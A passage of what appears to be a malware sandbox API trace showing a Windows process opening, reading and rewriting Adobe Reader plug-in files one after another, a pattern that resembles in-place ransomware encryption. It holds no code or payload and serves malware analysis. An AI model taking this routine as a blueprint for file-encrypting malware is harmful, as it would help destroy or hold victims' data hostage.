dwMilliseconds=0xffffffff) returned 0x0 [0086.165] ReleaseMutex (hMutex=0x168) returned 1 [0086.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0086.165] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEXShare.asfx", lpUsedDefaultChar=0x0) returned 13 [0086.165] ReadFile (in: hFile=0x1fc, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0086.168] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x793f [0086.168] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.169] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x793f [0086.169] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0086.169] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0086.169] WriteFile (in: hFile=0x1fc, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0086.170] CloseHandle (hObject=0x1fc) returned 1 [0086.170] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\AcroForm\\PMP\\AdobePDF417.pmp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\acroform\\pmp\\adobepdf417.pmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0086.288] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0086.288] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1aa00 [0086.291] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0086.291] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.291] ReleaseMutex (hMutex=0x168) returned 1 [0086.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobePDF417.pmp", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0086.291] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobePDF417.pmp", cchWideChar=15, lpMultiByteStr=0x1f7366c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobePDF417.pmp", lpUsedDefaultChar=0x0) returned 15 [0086.291] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0086.311] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x19a00 [0086.311] ReadFile (in: hFile=0x1f0, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.347] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x19a00 [0086.348] WriteFile (in: hFile=0x1f0, lpBuffer=0x2886de8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2886de8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0086.348] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0086.348] WriteFile (in: hFile=0x1f0, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0086.348] CloseHandle (hObject=0x1f0) returned 1 [0086.349] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\DVA.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\dva.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0086.350] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0086.350] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x24a63 [0086.350] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0086.350] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.351] ReleaseMutex (hMutex=0x168) returned 1 [0086.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.api", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0086.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DVA.api", cchWideChar=7, lpMultiByteStr=0x1f7ac0c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DVA.api", lpUsedDefaultChar=0x0) returned 7 [0086.351] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2d5f278*=0x8000, lpOverlapped=0x0) returned 1 [0086.407] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x23a63 [0086.407] ReadFile (in: hFile=0x1f0, lpBuffer=0x2886de8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2886de8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.432] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x23a63 [0086.433] WriteFile (in: hFile=0x1f0, lpBuffer=0x289f9a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x289f9a8*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0086.433] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0086.433] WriteFile (in: hFile=0x1f0, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2d5f28c*=0x8000, lpOverlapped=0x0) returned 1 [0086.434] CloseHandle (hObject=0x1f0) returned 1 [0086.434] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0086.435] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0086.435] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xa00 [0086.435] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0086.435] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.435] ReleaseMutex (hMutex=0x168) returned 1 [0086.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.DAN", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0086.435] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.DAN", cchWideChar=9, lpMultiByteStr=0x1f7344c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Flash.DAN", lpUsedDefaultChar=0x0) returned 9 [0086.435] ReadFile (in: hFile=0x1f0, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x2d5f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0086.723] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0086.723] WriteFile (in: hFile=0x1f0, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2d5f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0086.724] CloseHandle (hObject=0x1f0) returned 1 [0086.724] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.mpp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.mpp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0086.725] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0086.725] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1d800 [0086.725] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0086.725] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.725] ReleaseMutex (hMutex=0x168) returned 1 [0086.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.mpp", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0086.725] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.mpp", cchWideChar=9, lpMultiByteStr=0x1f7356c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Flash.mpp", lpUsedDefaultChar=0x0) returned 9 [0086.725] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0086.755] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1c800 [0086.755] ReadFile (in: hFile=0x1f0, lpBuffer=0x2695be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.761] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1c800 [0086.762] WriteFile (in: hFile=0x1f0, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0086.762] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0086.762] WriteFile (in: hFile=0x1f0, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0086.762] CloseHandle (hObject=0x1f0) returned 1 [0086.763] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\MCIMPP.CHT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.cht"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0086.764] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0086.764] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1a00 [0086.764] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0086.764] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.764] ReleaseMutex (hMutex=0x168) returned 1 [0086.764] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MCIMPP.CHT", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0086.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MCIMPP.CHT", cchWideChar=10, lpMultiByteStr=0x1f732cc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MCIMPP.CHT", lpUsedDefaultChar=0x0) returned 10 [0086.765] ReadFile (in: hFile=0x1f0, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2d5f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0086.781] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0086.781] WriteFile (in: hFile=0x1f0, lpBuffer=0x2691bb8*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0086.784] CloseHandle (hObject=0x1f0) returned 1 [0086.785] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0086.785] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0086.785] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1c00 [0086.786] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0086.786] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.786] ReleaseMutex (hMutex=0x168) returned 1 [0086.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mcimpp.KOR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0086.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mcimpp.KOR", cchWideChar=10, lpMultiByteStr=0x1f7366c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mcimpp.KOR", lpUsedDefaultChar=0x0) returned 10 [0086.786] ReadFile (in: hFile=0x1f0, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x2d5f2bc*=0x1c00, lpOverlapped=0x0) returned 1 [0086.807] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0086.808] WriteFile (in: hFile=0x1f0, lpBuffer=0x2886de8*, nNumberOfBytesToWrite=0x2188, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2886de8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x2188, lpOverlapped=0x0) returned 1 [0086.808] CloseHandle (hObject=0x1f0) returned 1 [0086.809] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.CHS" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.chs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0086.809] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0086.809] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xa00 [0086.809] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0086.810] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.810] ReleaseMutex (hMutex=0x168) returned 1 [0086.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.CHS", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0086.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.CHS", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuickTime.CHS", lpUsedDefaultChar=0x0) returned 13 [0086.810] ReadFile (in: hFile=0x1f0, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x2d5f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0086.831] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0086.831] WriteFile (in: hFile=0x1f0, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2d5f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0086.832] CloseHandle (hObject=0x1f0) returned 1 [0086.832] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0086.833] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0086.833] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xa00 [0086.833] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0086.833] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.833] ReleaseMutex (hMutex=0x168) returned 1 [0086.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.JPN", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0086.833] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.JPN", cchWideChar=13, lpMultiByteStr=0x1f7344c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuickTime.JPN", lpUsedDefaultChar=0x0) returned 13 [0086.833] ReadFile (in: hFile=0x1f0, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x2d5f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0086.835] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0086.835] WriteFile (in: hFile=0x1f0, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x2d5f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0086.836] CloseHandle (hObject=0x1f0) returned 1 [0086.836] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0086.837] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0086.837] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xa00 [0086.837] SetFilePointer 